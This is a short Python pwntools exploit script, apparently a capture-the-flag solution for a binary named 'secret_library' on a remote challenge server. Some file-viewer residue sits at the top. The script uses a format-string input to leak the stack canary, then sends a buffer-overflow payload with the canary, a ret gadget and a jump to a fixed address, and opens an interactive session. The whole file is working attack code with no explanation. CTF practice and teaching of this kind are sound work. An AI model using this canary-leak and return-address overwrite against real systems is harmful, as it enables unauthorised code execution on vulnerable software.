27 lines
571 B
Python
27 lines
571 B
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
CANARY_POS = 23
|
|
CANARY_OFF = 136
|
|
elf = context.binary = ELF("./secret_library", checksec=False)
|
|
|
|
#p = process(elf.path)
|
|
p = remote('offsec.m0lecon.it', 13501)
|
|
print(p.recvline())
|
|
p.sendline(f"%{CANARY_POS}$lx".encode())
|
|
val = p.recvline().split(b",")[1].strip()
|
|
print(val)
|
|
canary = int(val, 16)
|
|
print(p.recvline())
|
|
payload = flat(
|
|
b'A' * CANARY_OFF,
|
|
p64(canary),
|
|
b'B' * 8, #pass rbp
|
|
p64(0x000000000040101a),
|
|
p64(0x0000000000401262),
|
|
)
|
|
p.send(payload)
|
|
print(p.recvline())
|
|
#print(p.recvline())
|
|
p.interactive()
|